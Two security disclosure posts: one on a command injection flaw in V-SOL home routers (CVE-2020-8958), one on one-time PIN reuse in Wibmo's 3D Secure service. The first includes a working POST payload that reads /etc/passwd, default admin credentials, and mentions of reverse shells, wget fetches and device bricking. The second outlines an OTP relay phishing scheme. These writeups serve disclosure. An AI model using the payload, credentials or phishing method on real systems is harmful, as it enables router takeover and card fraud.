Arbitrary OS command injection on V-SOL home routers

This article details an arbitrary OS command injection vulnerability present in the management portal for several GPON home routers manufactured by Guangzhou V-SOLUTION (“V-SOL”). V-SOL manufactures a variety of FTTH and FTTB products, including residential gateway devices, network switches, line termination devices, and more.

This vulnerability was discovered and reported to the vendor in February of 2020, and to date, a patch has not been released. I decided that I would publish details about this specific vulnerability shortly after researchers Pierre Kim and Alexandre Torres published their own work documenting what they surmised to be potential backdoor accounts present in optical line termination devices manufactured by vendor ‘C-Data’ — as well as those manufactured by V-SOL.

CVE-2020-8958

The vulnerable endpoint is part of the ‘PING diagnosis’ functionality that is available on the device management portal, located at <IP_ADDR>/boaform/admin/formPing. Arbitrary command execution can be achieved by sending a crafted HTTP POST request containing shell meta-characters to the PING diagnosis endpoint.

POST http://<IP_ADDR>/boaform/admin/formPing HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://<IP_ADDR>
Connection: keep-alive
Referer: http://<IP_ADDR>/diag_ping_admin_en.asp
Upgrade-Insecure-Requests: 1
Host: <IP_ADDR>

target_addr=%3Bcat%20%2Fetc%2Fpasswd&waninf=LAN
A screenshot of the login form on the management portal

Administrator credentials are required in order to access the management portal and exploit this flaw. Default credentials for the device can be found in the table below.

UsernameHashPasswordUIDGIDShell
admin$1$$CoERg7ynjYLsj2j4glJ34.admin00/tmp:/bin/cli
adsl$1$$m9g7v7tSyWPyjvelclu6D1realtek00/tmp:/bin/cli
e8c$1$$L7MaPr42HrZ25CRVY1/89/00/tmp:/bin/cli
user$1$$ex9cQFo.PV11eSLXJFZuj.user10/tmp:/bin/cli

Note: Some versions of the device may come with different default credentials for accessing the administrative account. NETLINK, an Indian distributor of V-SOL devices, supplies stdONU101 as the default password for the administrative account.

A proof of concept script is available on this repository, execution of which will return the contents of the /etc/passwd file on a given vulnerable device. The help command provides a list of built-in shell commands that are available on the system.

. : [ [[ alias bg break cd chdir continue echo eval exec exit
export false fg hash help jobs kill let local printf pwd read
readonly return set shift source test times trap true type ulimit
umask unalias unset wait

A list of binaries available on the device can be found below.

11N_UDPserver
ShowStatus
aipc_util
arp
ash
auth
awk
boa
brctl
busybox
cat
chat
chmod
cli
config_wlan
configd
cp
ctadmin
cupsd
cwmpClient
dbg_tool
df
dhclient
dhcpd
dhcrelayV6
diag
diff
dnsmasq
ebtables
echo
ecmh
egrep
eponoamd
ethctl
expr
flash_erase
flash_eraseall
ftp
ftpd
fuser
grep
halt
ifconfig
igmpproxy
inetd
init
insmod
ip
ip6tables
ipcs
iptables
iptables-batch
iwcontrol
iwpriv
jsct_getloid
kill
killall
klogd
led
ledtest
linuxrc
loadconfig
login
loopback
lp
lpadmin
lpstat
ls
lsmod
md5sum
mdev
mfcv6d
mib
midware_intf
mini_upnpd
minidlna
miniupnpd
mkdir
mknod
mount
mpctl
nc
ntfs-3g
nv
oamcli
omci_app
omcicli
parallel
pidof
ping
ping6
pondetect
poweroff
ps
qc
radvd
radvdump
reboot
rm
rmmod
route
routed
saveconfig
sed
sh
show
sleep
slogd
smbd
spppctl
spppd
startcupsd
startup
stty
systemd
tar
tc
tcp2dev
telnetd
tftp
tftpd
top
traceroute
udhcpc
udhcpd
udpechoserver
umount
updatedd
updateddctrl
upnpctrl
upnpmd_cp
usbmount
vconfig
vsEncrypt
vsntp
vswdg
wdg
wget
wget_manage
wscd
xmlconfig

Note: It was found that executing the flash_eraseall command on a vulnerable device will — for most purposes — result in the device being stuck in a perpetually bricked state.

The device utilizes BusyBox and is somewhat limited in terms of supported functions. A list of available functions can be found below.

ash, awk, cat, chmod, cksum, cmp, cp, df, diff, echo, egrep, expr,
fuser, grep, halt, ifconfig, init, insmod, ipcs, kill, killall,
klogd, linuxrc, ls, lsmod, md5sum, mdev, mkdir, mknod, mount, nc,
pidof, ping, ping6, poweroff, ps, reboot, rm, rmmod, route, sed,
sh, sleep, stty, tar, top, traceroute, umount, vconfig

It is possible for a remote attacker to gain a reverse shell on the device using nc. It is also possible to wget files and write them to the /var/config directory on the device. This can be used by a remote attacker to download bash scripts or other files for carrying out post-exploitation activities on the system.

Note: wget will fail to fetch files — or rather will return empty files — if the server from which a particular file is being retrieved makes use of HTTPS.

Survey of affected devices

A brief survey of vulnerable devices reveals only one hardware version in usage: Version 1.1. Software versions that are known to be vulnerable fall between the ranges of V1.9.1-181203 and V2.9.0-181024, though it is suspected that build versions prior to V1.9.1-181203 would be affected too.

Note: No devices running build versions prior to V1.9.1-181203 were discovered during the course of this research.

In February, when the issue was first reported to the manufacturer, the Shodan search engine was indexing a total of 8,387 vulnerable devices. This figure, however, might not be fully representative of the actual number of vulnerable devices at any given point, considering that a) results indexed on Shodan only represent those devices that, at the time, had remote management enabled and b) some users might have changed the administrative credentials used to access the management portal.

A heat-map of countries where vulnerable devices are located (Shodan)

At the time this post was published, the number of vulnerable devices that were indexed on Shodan had dramatically reduced to 1,900. The reason for this decrease is not immediately apparent. A small country-wise list can be found below.

CountryNumber of devices
Cambodia579
India571
Brazil239
Bulgaria159
Philippines95

UPDATE — July 15, 2020 (6 PM IST)

After this vulnerability was publicly disclosed, it was discovered that a sizeable number of vulnerable devices were omitted from the list above, due to the manufacturer having had made cursory changes (such as to the <title> tag) on the landing page of the management portal on some devices. This initially hindered the process of device discovery through fingerprinting, and the updated tally of publicly accessible vulnerable devices now reflects upward of the 20,000 mark.

An updated heat-map of countries where vulnerable devices are located (Shodan)

Final notes

Though the device in question is originally manufactured by V-SOL, it is primarily sold around the world through a network of regional distributors. In some cases, distributors will also place their own branding on both the physical hardware and the management portal for the device.

While it was not feasible to compile a conclusive list of distributors, V-SOL states that they have shipped over 500,000 devices that are sold by distributors in Brazil, India, Ukraine, Poland, Thailand, and Bangladesh. On their website, V-SOL also states that they have produced over 2 million individual FTTx units for China Telecom and China Unicom.

In India, NETLINK (2801RW), SyroTech (HG323RGW), Digisol (DG-GR1310), and DBC Technologies are just a few of the companies that are involved in the marketing and distribution of networking devices manufactured by V-SOL. As of now, the devices that are offered by NETLINK and Digisol are confirmed to be vulnerable.

In the recent past, several other GPON network devices have been found to be similarly vulnerable, too. For instance: In 2018, researchers disclosed details about a similar flaw (CVE-201810561) affecting devices manufactured by California-based DASAN Zhone Solutions. The ecosystem of such devices has only become even more at risk since then, especially in light of the aforementioned research published by Kim et. al.

Vulnerability information

VendorDescriptionVulnerability ClassImpactRemotely exploitable
Guangzhou V-SOLUTIONGuangzhou 1GE ONU devices V2801RW and V2804RGW running build version 1.9.1-181203 through 2.9.0-181024 allow remote attackers to execute arbitrary OS commands via shell metacharacters in theboaform/admin/formPing Dest IP Address field.
[CVE-2020-8958]
Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) [CWE-78]Arbitrary OS command executionYES

Disclosure timeline

  • Feb 11, 2020 – Vendor informed of vulnerability via email;
  • Feb 13, 2020 – CVE-2020-8958 assigned;
  • July 15, 2020 – Vulnerability publicly disclosed.

Attacking a weak 3D Secure implementation

This article documents a security flaw in the mechanism through which the 3D Secure implementation of Wibmo — which is the primary integrator of the 3D Secure protocol for banks in India — handles the generation and processing of the one-time PIN used for performing cardholder verification. The mechanism used by the Wibmo 3D Secure Access Control Server for generating the one-time PIN improperly handles transactions that have been initiated within a 180 second time-frame of each other, resulting in the generation and delivery of a singular, non-unique one-time PIN for both of the transactions. The flaw allows an attacker to re-appropriate a one-time PIN which has been generated for a low-value transaction (e.g., 10 INR) for successfully completing another transaction of an arbitrary amount (e.g., 1000 INR).

3D Secure 1.0

The 3D Secure (“3domain structure”) protocol was originally developed by Arcot Systems for adding an additional layer of authentication for card-based transactions on the Internet. 3D Secure 1.0 (3DS1) has been the de-facto standard for online cardholder verification and has been adopted by several major card schemes, such as Visa through Verified by Visa and Mastercard through SecureCode.

The first iteration of the protocol has been criticized over time by various parties — including online merchants who have argued that implementation has an affect on conversion rates — as well as academic researchers, who have stated that the protocol may not be as effective in preventing card fraud as it is purported to be. 3DS1 has also been repeatedly criticized for non-uniformity, and implementations of the protocol have been noted as being “inconsistent from bank to bank and country to country.”

The Reserve Bank of India has long mandated that banks within the country implement “additional factor authentication” for all transactions where the physical presence of a payment instrument cannot be verified, e.g., for transactions which do not involve card interaction with a point-of sale-system. Indian banks traditionally perform online cardholder verification through confirmation of an additional authentication step, such as a user-defined PIN, passphrase, or a dynamic one-time PIN (OTP). While mandatory cardholder verification is generally perceived as a step in the right direction, it should noted that the Reserve Bank of India has not issued guidelines or best practices on how banks should implement secure additional factor authentication for their customers.

Wibmo 3DS 1.0

Wibmo — previously known as enStage — is a financial software and services provider based in Bangalore, India. The company acts as a 3DS1 integrator for a large number of significant financial institutions in India, including banks like Punjab National Bank, Kotak Mahindra Bank, Corporation Bank, and others.

The mechanism used by the Wibmo 3DS1 Access Control Server for generating the one-time PIN improperly handles transactions that have been initiated within a 180-second time-frame of each other, resulting in the generation and delivery of a singular, non-unique one-time PIN for both of the transactions.

The flaw can be observed by initiating a transaction for a low arbitrary amount (e.g., 1 INR), then consequently — within 180 seconds — initiating a parallel for a higher arbitrary amount (e.g., 1000 INR). The one-time PIN mechanism implemented on the 3DS Access Control Server will generate and deliver the same OTP to the customer in both cases. The delivered OTP can then be used for successfully authenticating either of the two transactions.

Store ABC - Verified by Visa

The two transactions need not be limited to the same merchant, meaning that, the OTP generated for transacting at Store ABC will be identically generated for transacting at Store XYZ — as long as the second transaction was initiated within the 180-second window. Another factor to note is that, the two transactions need not be initiated from the same IP address for the same OTP to be delivered twice. If that, however, were the case, perhaps not generating a fresh one-time PIN for the second transaction could be excused.

Store XYZ - Verified by Visa

Insecure OTP Generation

The non-uniqueness of the one-time PIN can be attributed to the OTP generation mechanism which has been employed by the 3DS Access Control Server — which relies solely on the customer’s credit or debit card number — in addition to a 180-second timer which is set by the Access Control Server during which requests for generating of a fresh OTP are not entertained. This essentially means that a fresh one-time PIN will not be generated until 180 seconds have elapsed from the generation of a previous OTP — without consideration of parameters such as TXN_ID, TXN_VALUE, IP_ADDR, etc.

Insecure OTP Generation Method
Current Method
Secure OTP Generation Method
Ideal Method

It can be assumed that the 180-second timer on OTP generation was put in place for reducing rigidity and friction, like in cases where a customer may have subpar cellular coverage and may repeatedly attempt to resend OTP several times in quick succession. Regardless, even if such a use case were given consideration, the design choice which dictates that an OTP should be generated solely on the basis of the card number — without accounting for dynamic parameters such as TXN_ID — which, if they were employed, would result in the generated OTP being unique across transactions — would perhaps still not be justifiable.

In an email response, Wibmo’s security team confirmed that OTP generation mechanism does not account for “a specific session or transaction, stating that only the payment card number is treated as an input parameter. The security team further went on to state that the weak handling of OTP generation “is not a flaw in the system, but a known functionality,” which is certainly not true, as other banks which make use of the 3D Secure protocol, such as HDFC Bank, generate a unique one-time PIN for each separate transaction, regardless of time elapsed from the generation of a previous OTP.

The email from the Wibmo security team further went on to remark that, since the validity of an OTP expires after being used once, that “an OTP generated for two parallel transactions can only ultimately still only be used in one.” The following section will demonstrate how the discovered flaw can be used for carrying out a convincing OTP relay or real-time phishing attack, similar to the type of attack which is employed for defeating Google’s 2FA — through automated phishing of the 2FA token.

Exploitation

An attacker can carry out an OTP relay or real-time phishing attack to automate siphoning of user funds. The first step of such an attack involves the customer submitting an OTP to the attacker’s domain, which is masquerading as a legitimate 3D Secure authentication page — but is instead actually only a wrapper for acquiring the OTP from the victim. The wrapper will call a payment API for initiating the first transaction with a non-suspicious value — and upon submission of the OTP to the wrapper page — would immediately initiate and successfully complete a transaction for a predefined high-value amount.

A tool such as Piotr Duszynski’s Modlishka — or Mike Felch’s CredSniper — or FireEye’s ReelPhish — can be configured for provisioning an automated phishing setup which targets the Wibmo 3D Secure ACS. A key advantage for an attacker here would be that, in most cases, 3D Secure ACS URLs are not the most memorable, and thus would not be immediately recognizable to a victim — unlike web addresses for popular services such as Google or Yahoo. Alternatively, an unsophisticated actor may quite simply just choose to remain low-technology and perform a tried and trusted social engineering attack.

Conclusion

The scope of affected banks is somewhat difficult to deduce in this case. Potentially affected banks can be identified prima facie through the presence of a “Powered by Wibmo” footer on the Access Control Server webpage. At the same time however, banks can choose to modify their implementation of 3D Secure 1.0, which means that particular banks may or may not employ the flawed OTP mechanism. Nevertheless, it can authoritatively be said that this flaw does affect all payment cards issued by Kotak Mahindra Bank and Punjab National Bank, at the very least.

An extended list of banks which have used Wibmo for integration with 3D Secure 1.0 can be found here.

This flaw was disclosed to Wibmo on August 3, 2019. The security team at Wibmo closed the issue and marked it as known functionality on August 12, 2019. The flaw was publicly disclosed on August 25, 2019. I would like to thank Abhay Rana for the assistance he provided in helping ascertain the scope of this issue.